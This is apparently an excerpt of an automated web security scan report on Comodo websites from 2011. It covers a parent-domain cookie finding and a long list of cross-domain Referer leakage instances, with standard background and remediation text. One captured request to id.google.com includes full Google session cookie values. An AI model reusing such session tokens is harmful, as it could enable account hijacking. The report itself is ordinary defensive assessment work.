GET /verify/EAAAAJ59_TqDCWw9F_a-CecOvJE.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=comodo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=51=5jDNJdHYl6hy7G524Hsvf3N5RrNMBaTwe5ZLSn6kJw=6lUY77-PJ0uhtb3y; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=mCI0VZozMcVtfOnsXPWKRIg4CFYHD91WLLi_uPVaxjIGdNNCCPTpbb-Y6ItlcrUaFRZ1_uYF76XD4xG_aXDqKnNnWckAgZKDE_tqIYZX_5tTbL1lkWSJHXddkQriOGGX; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjraOk0NnKnon18FmQ0anHqw5G5b8D7UKVV-fvoBa-B7nHUAI1yJPXkeoZPmNzpO5TVyyzlW1fNxwBHtH2HmDETt4jQdxjCyPqZ0_Mz1dsplqhrmR2JS56T55_h5iz2URKMamLZkIdrgZB_dQvqVSloGJgky-ppUKdS0uO8737_ewtjmsYtlOysbxj00Pjud9F-PuoMEpszT-bzZhHJBEZepn0S0pmDxxr7KidOd1oXi21FARDUcsfI_WLw-qAvsGbFgIXIj_A7xnaM4KZLe8U31tgLzYqwxvP5awMCzfx50c

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=51=OBRz60dp-DT3RAGbzX_UkT2S5miM5xizmspOAgxE4g=j_IIDIbd7xiwAAO8; expires=Mon, 19-Mar-2012 01:49:33 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sun, 18 Sep 2011 01:49:33 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.3. http://www.bizographics.com/collect/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bizographics.com
Path:	/collect/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Fri, 16-Sep-2016 12:16:27 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11. Cross-domain Referer leakage previous next
There are 439 instances of this issue:

http://antivirus.comodo.com/antivirus_download.php
http://antivirus.comodo.com/cis-pro_download.php
http://antivirus.comodo.com/click-track/BTTN/SLIDER/AV
http://antivirus.comodo.com/click-track/BTTN/SLIDER/CompareProductsBestVirus
http://antivirus.comodo.com/click-track/BTTN/SLIDER/LearnMoreCleanPC
http://antivirus.comodo.com/click-track/EXE/AV
http://antivirus.comodo.com/click-track/IMAGE/CompareAV
http://antivirus.comodo.com/click-track/IMAGE/logo
http://antivirus.comodo.com/click-track/LEAD/CAM/AAV-Buy
http://antivirus.comodo.com/click-track/LEAD/CAM/AAV-Trail
http://antivirus.comodo.com/click-track/LEAD/CAM/CIS-PRO-Buy
http://antivirus.comodo.com/click-track/LEAD/CAM/CIS-PRO-Trail
http://antivirus.comodo.com/click-track/LEAD/CAM/SLIDER/CIS-PRO
http://antivirus.comodo.com/click-track/NAV/BusinessAV
http://antivirus.comodo.com/click-track/NAV/CleanMyPC
http://antivirus.comodo.com/click-track/NAV/Compare
http://antivirus.comodo.com/click-track/NAV/Innovation
http://antivirus.comodo.com/click-track/NAV/Products
http://antivirus.comodo.com/click-track/TXT/AboutComodo
http://antivirus.comodo.com/click-track/TXT/AccountLogin
http://antivirus.comodo.com/click-track/TXT/ComodoLogo
http://antivirus.comodo.com/click-track/TXT/CompareSolutions
http://antivirus.comodo.com/click-track/TXT/CompareSolutionsTitle
http://antivirus.comodo.com/click-track/TXT/FullComparisonChart
http://antivirus.comodo.com/click-track/TXT/LearnMore-PCinfected
http://antivirus.comodo.com/click-track/TXT/LearnMoreAV
http://antivirus.comodo.com/click-track/TXT/LearnMoreCIS-PLUS
http://antivirus.comodo.com/click-track/TXT/LearnMoreCIS-PRO
http://antivirus.comodo.com/click-track/TXT/PrivacyPolicy
http://antivirus.comodo.com/click-track/TXT/TITLE/PCinfected
http://antivirus.comodo.com/click-track/TXT/Terms
http://antivirus.comodo.com/click-track/TXT/support
http://antivirus.comodo.com/click-track/VIDEO/IMAGE/WatchVideo
http://antivirus.comodo.com/click-track/VIDEO/TITLE/WatchVideo
http://antivirus.comodo.com/click-track/VIDEO/TXT/WatchVideo
http://antivirus.comodo.com/includes/video.php
http://efaxcorporate.com/
http://efaxdeveloper.com/
http://enterprise.comodo.com/includes/video.php
http://forums.comodo.com/comodorss.php
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html
http://personalfirewall.comodo.com/cis-pro_download.html
http://personalfirewall.comodo.com/internal/DOWNLOAD/cfw_installer
http://personalfirewall.comodo.com/internal/DOWNLOAD/cfw_installer_x64
http://personalfirewall.comodo.com/internal/DOWNLOAD/cfw_installer_x86
http://personalfirewall.comodo.com/internal/ESM/enterprise.comodo.com/security-solutions/endpoint-security/endpoint-security-manager/
http://personalfirewall.comodo.com/internal/LINK/Comodo-Antivirus
http://personalfirewall.comodo.com/internal/LINK/Comodo-Firewall
http://personalfirewall.comodo.com/internal/LINK/Download-CIS-PRO
http://personalfirewall.comodo.com/internal/LINK/Free-30-Days
http://personalfirewall.comodo.com/internal/LINK/Live-Expert-Help
http://personalfirewall.comodo.com/internal/LINK/TrustConnectPromo
http://personalfirewall.comodo.com/internal/LINK/comodo.com/repository/chatbasedservices.pdf
http://personalfirewall.comodo.com/internal/LINK/enterprise.comodo.com/security-solutions/endpoint-security/endpoint-security-manager/
http://personalfirewall.comodo.com/internal/NAV/Buy-Now
http://personalfirewall.comodo.com/internal/NAV/Buy-Now-Button
http://personalfirewall.comodo.com/internal/NAV/Try-It-Free-30-Days
http://search.atomz.com/search/
https://secure.comodo.com/home/purchase.php
http://www.clicktale.com/ProductPage.aspx
http://www.comodo.com/click-track/BTN/ECOMshop
http://www.comodo.com/click-track/BTN/ENTexplore
http://www.comodo.com/click-track/BTN/FREEall
http://www.comodo.com/click-track/BTN/GB
http://www.comodo.com/click-track/BTN/HOME5points
http://www.comodo.com/click-track/BTN/LearnMore/
http://www.comodo.com/click-track/BTN/MainSMBexplore
http://www.comodo.com/click-track/BTTN/EXE/GB
http://www.comodo.com/click-track/BTTN/FreeDownloadFAQ/
http://www.comodo.com/click-track/BTTN/FreeDownloadFeatures/
http://www.comodo.com/click-track/BTTN/FreeDownloadImpFeatures/
http://www.comodo.com/click-track/BTTN/FreeDownloadSysReq/
http://www.comodo.com/click-track/EMAIL/CISQuestions/
http://www.comodo.com/click-track/EMAIL/DesktopSupport/
http://www.comodo.com/click-track/EXE/GB/
http://www.comodo.com/click-track/LEAD/BottomVisitOurStore/
http://www.comodo.com/click-track/LEAD/BuyNowFeatures/
http://www.comodo.com/click-track/LEAD/DownloadNowFAQ/
http://www.comodo.com/click-track/LEAD/DownloadNowFeatures/
http://www.comodo.com/click-track/LEAD/DownloadNowVideo/
http://www.comodo.com/click-track/LEAD/DownloadNowWhyGB/
http://www.comodo.com/click-track/LEAD/Free-SSL-Certificate/
http://www.comodo.com/click-track/LEAD/GetItNowBott/
http://www.comodo.com/click-track/LEAD/GetItNowTop/
http://www.comodo.com/click-track/LEAD/GetTheMostBottom/
http://www.comodo.com/click-track/LEAD/ScanYourSite/
http://www.comodo.com/click-track/LEAD/TryGBtoday/
http://www.comodo.com/click-track/LEAD/VisitStoreTop/
http://www.comodo.com/click-track/MORE/GB
http://www.comodo.com/click-track/PDF/CISUserGuide2011/
http://www.comodo.com/click-track/TXT/AVFreeDownload/
http://www.comodo.com/click-track/TXT/AVProg/
http://www.comodo.com/click-track/TXT/AVmoreInfo/
http://www.comodo.com/click-track/TXT/AboutUs/
http://www.comodo.com/click-track/TXT/AllComodoCerts/
http://www.comodo.com/click-track/TXT/AllFree/
http://www.comodo.com/click-track/TXT/AllFreeSol/
http://www.comodo.com/click-track/TXT/AllSSLCertificatesBottom/
http://www.comodo.com/click-track/TXT/AllSSLCerts/
http://www.comodo.com/click-track/TXT/AntiMalFreeDLoad/
http://www.comodo.com/click-track/TXT/AntiMalMoreInfo/
http://www.comodo.com/click-track/TXT/AntiSpamFreeDownload/
http://www.comodo.com/click-track/TXT/AntiSpamMoreInfo/
http://www.comodo.com/click-track/TXT/AuthEmailEncrpy/
http://www.comodo.com/click-track/TXT/AuthTwoFactor/
http://www.comodo.com/click-track/TXT/AuthViewAllSol/
http://www.comodo.com/click-track/TXT/BasicSSL/
http://www.comodo.com/click-track/TXT/BusSitemap/
http://www.comodo.com/click-track/TXT/BuyerTrust/
http://www.comodo.com/click-track/TXT/CISFreeDownload/
http://www.comodo.com/click-track/TXT/CISReleaseNotes/
http://www.comodo.com/click-track/TXT/CISmoreInfo/
http://www.comodo.com/click-track/TXT/COT/
http://www.comodo.com/click-track/TXT/Careers/
http://www.comodo.com/click-track/TXT/CertManager/
http://www.comodo.com/click-track/TXT/CodeSignCertificates/
http://www.comodo.com/click-track/TXT/CodeSigning/
http://www.comodo.com/click-track/TXT/Community/CEOBlog/
http://www.comodo.com/click-track/TXT/Community/ComodoTV/
http://www.comodo.com/click-track/TXT/Community/EcommerceBlog/
http://www.comodo.com/click-track/TXT/Community/Forums/
http://www.comodo.com/click-track/TXT/Community/ITSecurityBlog/
http://www.comodo.com/click-track/TXT/Community/PCSecurityBlog/
http://www.comodo.com/click-track/TXT/Community/Support/
http://www.comodo.com/click-track/TXT/Community/UserGuides/
http://www.comodo.com/click-track/TXT/Comodo-China/
http://www.comodo.com/click-track/TXT/ComodoBackupFreeDload/
http://www.comodo.com/click-track/TXT/ComodoBackupMoreInfo/
http://www.comodo.com/click-track/TXT/ComodoSSL/
http://www.comodo.com/click-track/TXT/ContactSales2/
http://www.comodo.com/click-track/TXT/ContactUs/
http://www.comodo.com/click-track/TXT/ContentVerification/
http://www.comodo.com/click-track/TXT/Database/
http://www.comodo.com/click-track/TXT/DigitalCert/
http://www.comodo.com/click-track/TXT/DigitalCertificatesLearnMore/
http://www.comodo.com/click-track/TXT/DigitalCertsEVSSL/
http://www.comodo.com/click-track/TXT/DiskEncryptFreeDownload/
http://www.comodo.com/click-track/TXT/DiskEncryptMoreInfo/
http://www.comodo.com/click-track/TXT/ECOMallCerts
http://www.comodo.com/click-track/TXT/ENTlearn
http://www.comodo.com/click-track/TXT/EVSSLLearnMore/
http://www.comodo.com/click-track/TXT/EmailCert/
http://www.comodo.com/click-track/TXT/EmailCertificate/
http://www.comodo.com/click-track/TXT/EmailCerts/
http://www.comodo.com/click-track/TXT/EndpointSecurityManager/
http://www.comodo.com/click-track/TXT/Enterprise/
http://www.comodo.com/click-track/TXT/ExtendedVal/
http://www.comodo.com/click-track/TXT/FREEall
http://www.comodo.com/click-track/TXT/FirewallDownload/
http://www.comodo.com/click-track/TXT/FirewallMoreInfo/
http://www.comodo.com/click-track/TXT/Forums/
http://www.comodo.com/click-track/TXT/Free90DaySSL/
http://www.comodo.com/click-track/TXT/FreeEmailFreeDownload/
http://www.comodo.com/click-track/TXT/FreeEmailMoreInfo/
http://www.comodo.com/click-track/TXT/FreeFirewallandAV/
http://www.comodo.com/click-track/TXT/FreeSSL/
http://www.comodo.com/click-track/TXT/FreeSSLCert/
http://www.comodo.com/click-track/TXT/FreeSSLCertificates/
http://www.comodo.com/click-track/TXT/FreeTrustMark/
http://www.comodo.com/click-track/TXT/GB
http://www.comodo.com/click-track/TXT/HHO/
http://www.comodo.com/click-track/TXT/HHO/Backup
http://www.comodo.com/click-track/TXT/HHO/Backup/comodo
http://www.comodo.com/click-track/TXT/HHO/Backup/online
http://www.comodo.com/click-track/TXT/HHO/Browsers
http://www.comodo.com/click-track/TXT/HHO/Browsers/dragon
http://www.comodo.com/click-track/TXT/HHO/Browsers/hopsurf
http://www.comodo.com/click-track/TXT/HHO/EmailSecurity
http://www.comodo.com/click-track/TXT/HHO/EmailSecurity/AntiSpam
http://www.comodo.com/click-track/TXT/HHO/EmailSecurity/FreeEmailCert
http://www.comodo.com/click-track/TXT/HHO/EmailSecurity/SecureEmail
http://www.comodo.com/click-track/TXT/HHO/EmailSecurity/Unite
http://www.comodo.com/click-track/TXT/HHO/FreeProducts
http://www.comodo.com/click-track/TXT/HHO/FreeProducts/ALL
http://www.comodo.com/click-track/TXT/HHO/FreeProducts/AV
http://www.comodo.com/click-track/TXT/HHO/FreeProducts/AntiSpam
http://www.comodo.com/click-track/TXT/HHO/FreeProducts/EmailCert
http://www.comodo.com/click-track/TXT/HHO/FreeTrials
http://www.comodo.com/click-track/TXT/HHO/FreeTrials/AVse
http://www.comodo.com/click-track/TXT/HHO/FreeTrials/CISpro
http://www.comodo.com/click-track/TXT/HHO/ISS
http://www.comodo.com/click-track/TXT/HHO/ISS/AV
http://www.comodo.com/click-track/TXT/HHO/ISS/AVse
http://www.comodo.com/click-track/TXT/HHO/ISS/AntiMalware
http://www.comodo.com/click-track/TXT/HHO/ISS/CISpro
http://www.comodo.com/click-track/TXT/HHO/ISS/CloudScanner
http://www.comodo.com/click-track/TXT/HHO/ISS/DiskEncryption
http://www.comodo.com/click-track/TXT/HHO/ISS/Firewall
http://www.comodo.com/click-track/TXT/HHO/ISS/IS
http://www.comodo.com/click-track/TXT/HHO/ISS/IScomplete
http://www.comodo.com/click-track/TXT/HHO/ISS/ISplus
http://www.comodo.com/click-track/TXT/HHO/ISS/TrustConnect
http://www.comodo.com/click-track/TXT/HHO/ISS/VE
http://www.comodo.com/click-track/TXT/HHO/PCsupport
http://www.comodo.com/click-track/TXT/HHO/PCsupport/ProgramsManager
http://www.comodo.com/click-track/TXT/HHO/PCsupport/SysClean
http://www.comodo.com/click-track/TXT/HHOSitemap/
http://www.comodo.com/click-track/TXT/HOME5points
http://www.comodo.com/click-track/TXT/HackerProofLearnMore/
http://www.comodo.com/click-track/TXT/HomeSitmap/
http://www.comodo.com/click-track/TXT/IntSec/
http://www.comodo.com/click-track/TXT/InternetSecurity/
http://www.comodo.com/click-track/TXT/LargEnterprise/
http://www.comodo.com/click-track/TXT/LearnMoreEasyVPN/
http://www.comodo.com/click-track/TXT/LearnMoreSecureEmail/
http://www.comodo.com/click-track/TXT/LegalRepos/
http://www.comodo.com/click-track/TXT/LivePCSupport/
http://www.comodo.com/click-track/TXT/Login/
http://www.comodo.com/click-track/TXT/MainSMBlearnMore
http://www.comodo.com/click-track/TXT/MainSitemap/
http://www.comodo.com/click-track/TXT/ManagedSupportLearnMore/
http://www.comodo.com/click-track/TXT/MedSmaBuss/
http://www.comodo.com/click-track/TXT/NewsRoom/
http://www.comodo.com/click-track/TXT/PCIComplianceLearnMore/
http://www.comodo.com/click-track/TXT/PCIScanning/
http://www.comodo.com/click-track/TXT/Partners/
http://www.comodo.com/click-track/TXT/PrivPolicy/
http://www.comodo.com/click-track/TXT/Products/
http://www.comodo.com/click-track/TXT/Products/Auth
http://www.comodo.com/click-track/TXT/Products/Auth/Auth
http://www.comodo.com/click-track/TXT/Products/Backup
http://www.comodo.com/click-track/TXT/Products/Backup/comodo
http://www.comodo.com/click-track/TXT/Products/Backup/online
http://www.comodo.com/click-track/TXT/Products/Browsers
http://www.comodo.com/click-track/TXT/Products/Browsers/dragon
http://www.comodo.com/click-track/TXT/Products/Browsers/hopsurf
http://www.comodo.com/click-track/TXT/Products/CodeSign
http://www.comodo.com/click-track/TXT/Products/CodeSign/CodeSign
http://www.comodo.com/click-track/TXT/Products/Ecom-SSL
http://www.comodo.com/click-track/TXT/Products/Ecom-SSL/ALL
http://www.comodo.com/click-track/TXT/Products/Ecom-SSL/elite
http://www.comodo.com/click-track/TXT/Products/Ecom-SSL/ev
http://www.comodo.com/click-track/TXT/Products/Ecom-SSL/uc
http://www.comodo.com/click-track/TXT/Products/EmailCert
http://www.comodo.com/click-track/TXT/Products/EmailCert/EmailCert
http://www.comodo.com/click-track/TXT/Products/EmailSecurity
http://www.comodo.com/click-track/TXT/Products/EmailSecurity/ALL
http://www.comodo.com/click-track/TXT/Products/EmailSecurity/AntiSpam
http://www.comodo.com/click-track/TXT/Products/EmailSecurity/EmailPrivacy
http://www.comodo.com/click-track/TXT/Products/EmailSecurity/SecureEmail
http://www.comodo.com/click-track/TXT/Products/Endpoint
http://www.comodo.com/click-track/TXT/Products/Endpoint/ComodoCleaningEssentials
http://www.comodo.com/click-track/TXT/Products/Endpoint/Endpoint
http://www.comodo.com/click-track/TXT/Products/FreeProducts
http://www.comodo.com/click-track/TXT/Products/FreeProducts/ALL
http://www.comodo.com/click-track/TXT/Products/FreeProducts/AV
http://www.comodo.com/click-track/TXT/Products/FreeProducts/AntiSpam
http://www.comodo.com/click-track/TXT/Products/FreeProducts/EmailCerts
http://www.comodo.com/click-track/TXT/Products/FreeTrials
http://www.comodo.com/click-track/TXT/Products/FreeTrials/ALL
http://www.comodo.com/click-track/TXT/Products/FreeTrials/AVse
http://www.comodo.com/click-track/TXT/Products/FreeTrials/CISpro
http://www.comodo.com/click-track/TXT/Products/FreeTrials/PCI
http://www.comodo.com/click-track/TXT/Products/IS-software
http://www.comodo.com/click-track/TXT/Products/IS-software/ALL
http://www.comodo.com/click-track/TXT/Products/IS-software/AV
http://www.comodo.com/click-track/TXT/Products/IS-software/Firewall
http://www.comodo.com/click-track/TXT/Products/IS-software/cisPro
http://www.comodo.com/click-track/TXT/Products/PCI
http://www.comodo.com/click-track/TXT/Products/PCI/PCI
http://www.comodo.com/click-track/TXT/Products/PCsupport
http://www.comodo.com/click-track/TXT/Products/PCsupport/ALL
http://www.comodo.com/click-track/TXT/Products/PCsupport/GB
http://www.comodo.com/click-track/TXT/Products/PCsupport/PCsupport
http://www.comodo.com/click-track/TXT/Products/PCsupport/ProgramsManager
http://www.comodo.com/click-track/TXT/Products/PCsupport/SysClean
http://www.comodo.com/click-track/TXT/Products/PKI
http://www.comodo.com/click-track/TXT/Products/PKI/PKI
http://www.comodo.com/click-track/TXT/Products/SiteSeal
http://www.comodo.com/click-track/TXT/Products/SiteSeal/ALL
http://www.comodo.com/click-track/TXT/Products/SiteSeal/BuyerTrust
http://www.comodo.com/click-track/TXT/Products/SiteSeal/COT
http://www.comodo.com/click-track/TXT/Products/SiteSeal/HP
http://www.comodo.com/click-track/TXT/ReadMoreESMwhitePaper/
http://www.comodo.com/click-track/TXT/Resources/
http://www.comodo.com/click-track/TXT/SMB/
http://www.comodo.com/click-track/TXT/SMB/Auth
http://www.comodo.com/click-track/TXT/SMB/Auth/Auth
http://www.comodo.com/click-track/TXT/SMB/CodeSign
http://www.comodo.com/click-track/TXT/SMB/CodeSign/CodeSign
http://www.comodo.com/click-track/TXT/SMB/EmailCerts
http://www.comodo.com/click-track/TXT/SMB/EmailCerts/EmailCerts
http://www.comodo.com/click-track/TXT/SMB/EmailSecurity
http://www.comodo.com/click-track/TXT/SMB/EmailSecurity/SecureEmail
http://www.comodo.com/click-track/TXT/SMB/EmailSecurity/Unite
http://www.comodo.com/click-track/TXT/SMB/Endpoint
http://www.comodo.com/click-track/TXT/SMB/Endpoint/ComodoCleaningEssentials
http://www.comodo.com/click-track/TXT/SMB/Endpoint/Endpoint
http://www.comodo.com/click-track/TXT/SMB/PCI
http://www.comodo.com/click-track/TXT/SMB/PCI/PCI
http://www.comodo.com/click-track/TXT/SMB/PCsupport
http://www.comodo.com/click-track/TXT/SMB/PCsupport/PCsupportMan
http://www.comodo.com/click-track/TXT/SMB/PCsupport/lps
http://www.comodo.com/click-track/TXT/SMB/PKI
http://www.comodo.com/click-track/TXT/SMB/PKI/CertMan
http://www.comodo.com/click-track/TXT/SMB/SSL
http://www.comodo.com/click-track/TXT/SMB/SSL/CV
http://www.comodo.com/click-track/TXT/SMB/SSL/EV
http://www.comodo.com/click-track/TXT/SMB/SSL/EVmulti
http://www.comodo.com/click-track/TXT/SMB/SSL/Elite
http://www.comodo.com/click-track/TXT/SMB/SSL/Free90
http://www.comodo.com/click-track/TXT/SMB/SSL/Mult-Domain
http://www.comodo.com/click-track/TXT/SMB/SSL/UC
http://www.comodo.com/click-track/TXT/SMB/SSL/Wildcard
http://www.comodo.com/click-track/TXT/SSL-Certificate/
http://www.comodo.com/click-track/TXT/ScanCompPCIScanning/
http://www.comodo.com/click-track/TXT/ScanCompViewALL/
http://www.comodo.com/click-track/TXT/SecondLargestCA/
http://www.comodo.com/click-track/TXT/SecurMessMoreInfo/
http://www.comodo.com/click-track/TXT/SecureEmailMoreInfo/
http://www.comodo.com/click-track/TXT/SecureEmailPersoUse/
http://www.comodo.com/click-track/TXT/SecureMessFreePersUse/
http://www.comodo.com/click-track/TXT/ServerSupport/
http://www.comodo.com/click-track/TXT/Signup/
http://www.comodo.com/click-track/TXT/SiteSealViewALL/
http://www.comodo.com/click-track/TXT/SmallMediumBusines/
http://www.comodo.com/click-track/TXT/SubmitFiles/
http://www.comodo.com/click-track/TXT/SubmitForm/
http://www.comodo.com/click-track/TXT/SuppMaint/
http://www.comodo.com/click-track/TXT/Support/
http://www.comodo.com/click-track/TXT/SupportForums/
http://www.comodo.com/click-track/TXT/SupportPages/
http://www.comodo.com/click-track/TXT/TAB/FAQ/
http://www.comodo.com/click-track/TXT/TAB/Features/
http://www.comodo.com/click-track/TXT/TAB/Overview/
http://www.comodo.com/click-track/TXT/TAB/Support/
http://www.comodo.com/click-track/TXT/TAB/Video/
http://www.comodo.com/click-track/TXT/TermsAndCond/
http://www.comodo.com/click-track/TXT/TwoFactorAuthentication/
http://www.comodo.com/click-track/TXT/UCC/
http://www.comodo.com/click-track/TXT/UCCLearnMore/
http://www.comodo.com/click-track/TXT/UnifiedComm/
http://www.comodo.com/click-track/TXT/UnifiedCommCert/
http://www.comodo.com/click-track/TXT/UserTrust/
http://www.comodo.com/click-track/TXT/VEngineFreeDownload/
http://www.comodo.com/click-track/TXT/VEngineMoreInfo/
http://www.comodo.com/click-track/TXT/VirtPrivNetwork/
http://www.comodo.com/click-track/TXT/VirusDefinitions/
http://www.comodo.com/click-track/TXT/VulnScanning/
http://www.comodo.com/click-track/TXT/WildcardSSL/
http://www.comodo.com/click-track/TXT/digital-certificates/
http://www.comodo.com/click-track/TXT/e-commerce/
http://www.comodo.com/click-track/TXT/eComm/
http://www.comodo.com/click-track/TXT/eComm/Auth
http://www.comodo.com/click-track/TXT/eComm/Auth/Auth
http://www.comodo.com/click-track/TXT/eComm/Bundle
http://www.comodo.com/click-track/TXT/eComm/Bundle/LearnMore
http://www.comodo.com/click-track/TXT/eComm/CodeSign
http://www.comodo.com/click-track/TXT/eComm/CodeSign/CodeSign
http://www.comodo.com/click-track/TXT/eComm/EmailCerts
http://www.comodo.com/click-track/TXT/eComm/EmailCerts/EmailCerts
http://www.comodo.com/click-track/TXT/eComm/EmailSecurity
http://www.comodo.com/click-track/TXT/eComm/EmailSecurity/SecureEmail
http://www.comodo.com/click-track/TXT/eComm/EmailSecurity/Unite
http://www.comodo.com/click-track/TXT/eComm/EndpointSecurity
http://www.comodo.com/click-track/TXT/eComm/EndpointSecurity/EndpointSecurityManager
http://www.comodo.com/click-track/TXT/eComm/PCI
http://www.comodo.com/click-track/TXT/eComm/PCI/PCI
http://www.comodo.com/click-track/TXT/eComm/PCsupport
http://www.comodo.com/click-track/TXT/eComm/PCsupport/PCsupport
http://www.comodo.com/click-track/TXT/eComm/SSL
http://www.comodo.com/click-track/TXT/eComm/SSL/CV
http://www.comodo.com/click-track/TXT/eComm/SSL/EV
http://www.comodo.com/click-track/TXT/eComm/SSL/EVmulti
http://www.comodo.com/click-track/TXT/eComm/SSL/Elite
http://www.comodo.com/click-track/TXT/eComm/SSL/Free90Day
http://www.comodo.com/click-track/TXT/eComm/SSL/MultiDomain
http://www.comodo.com/click-track/TXT/eComm/SSL/UC
http://www.comodo.com/click-track/TXT/eComm/SSL/Wildcard
http://www.comodo.com/click-track/TXT/eComm/SiteSeals
http://www.comodo.com/click-track/TXT/eComm/SiteSeals/BuyerTrust
http://www.comodo.com/click-track/TXT/eComm/SiteSeals/COT
http://www.comodo.com/click-track/TXT/eComm/SiteSeals/HackerProof
http://www.comodo.com/click-track/TXT/eComm/SiteSeals/UserTrust
http://www.comodo.com/click-track/TXT/eCommComodoSSL/
http://www.comodo.com/click-track/TXT/eCommEVSSL/
http://www.comodo.com/click-track/TXT/eCommUnifiedComm/
http://www.comodo.com/click-track/TXT/eCommViewAll/
http://www.comodo.com/click-track/TXT/evssl/
http://www.comodo.com/click-track/TXT/free-products/
http://www.comodo.com/click-track/TXT/scrollTab-LearnMore-EVSSL/
http://www.comodo.com/click-track/TXT/scrollTab-vid-MDC/
http://www.comodo.com/click-track/TXT/scrollTab-vid-emerchant/
http://www.comodo.com/click-track/TXT/scrollTab-vid-pci/
http://www.comodo.com/click-track/TXT/scrollTab-webinar-pci/
http://www.comodo.com/click-track/TXT/scrollTab-webinar-socialMedia/
http://www.comodo.com/click-track/TXT/scrollTab-webinar-viewAll/
http://www.comodo.com/click-track/TXT/scrollTab/Authentication/
http://www.comodo.com/click-track/TXT/scrollTab/CodeSigningCertificate/
http://www.comodo.com/click-track/TXT/scrollTab/E-CommerceBundle/
http://www.comodo.com/click-track/TXT/scrollTab/EmailCertificate/
http://www.comodo.com/click-track/TXT/scrollTab/EmailSecurity/
http://www.comodo.com/click-track/TXT/scrollTab/EndpointSecurity/
http://www.comodo.com/click-track/TXT/scrollTab/ManagedSupport/
http://www.comodo.com/click-track/TXT/scrollTab/PCIScanning/
http://www.comodo.com/click-track/TXT/scrollTab/PKIMangement/
http://www.comodo.com/click-track/TXT/scrollTab/RemoteAccess/
http://www.comodo.com/click-track/TXT/scrollTab/SSLCertificates/
http://www.comodo.com/click-track/TXT/scrollTab/SiteSeals/
http://www.comodo.com/click-track/TXT/seealltrustmarks/
http://www.comodo.com/click-track/VIDEO/
http://www.comodo.com/click-track/VIDEO/CertificateManager
http://www.comodo.com/click-track/external/IMG/Amazonlogo/
http://www.comodo.com/click-track/external/IMG/Fryslogo/
http://www.comodo.com/click-track/external/IMG/MicroLogo/
http://www.comodo.com/click-track/external/IMG/Newegglogo/
http://www.comodo.com/e-commerce/ssl-certificates/ev-ssl-certificates.php
http://www.comodo.com/home/download/download.php
http://www.comodo.com/home/download/release-notes.php
http://www.comodo.com/includes/awards.php
http://www.comodo.com/includes/video.php
http://www.comodo.com/resources/index.php
https://www.comodo.com/buy-ssl/select-ssl.php
http://www.enterprisessl.com/ssl-certificate-products/addsupport/ev.html
http://www.enterprisessl.com/ssl-certificate-products/addsupport/hg.html
http://www.enterprisessl.com/ssl-certificate-products/addsupport/hp.html
http://www.enterprisessl.com/ssl-certificate-products/addsupport/ssl-purchase.html
http://www.fusemail.com/
http://www.fusemail.com/products/email-archiving/request-more-information/
http://www.fusemail.com/products/spam-and-virus-filtering/request-more-information/
http://www.fusemail.com/wp-content/themes/biznizz/includes/js/jquery.prettyPhoto.js
http://www.google.com/search
http://www.govinfosecurity.com/articles.php
http://www.j2.com/
https://www.j2.com/jconnect/twa/page/homePage
http://www.keepitsafe.com/corporate_enterprise.php
https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestion
https://www.panopticsecurity.com/PCICS/MerController/doQuestion
https://www.panopticsecurity.com/PCICS/MerController/doStart
https://www.panopticsecurity.com/PCICS/MerController/doStart98387ea42c7965f4e9e68c9f
https://www.panopticsecurity.com/PCICS/MerController/doStart98387ea47caef170b1bb176d
https://www.panopticsecurity.com/PCICS/MerController/doUpdateFundamentalAnswers
https://www.panopticsecurity.com/PCICS/PanController/doInitUser
https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser
http://www.seeos.com/js/google_lander.js
http://www.seeos.com/search.php

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

11.1. http://antivirus.comodo.com/antivirus_download.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/antivirus_download.php

Issue detail

The page was loaded from a URL containing a query string:

http://antivirus.comodo.com/antivirus_download.php?af=1165

The response contains the following links to other domains:

http://cdn.optimizely.com/js/8018129.js
http://s7.addthis.com/js/250/addthis_widget.js
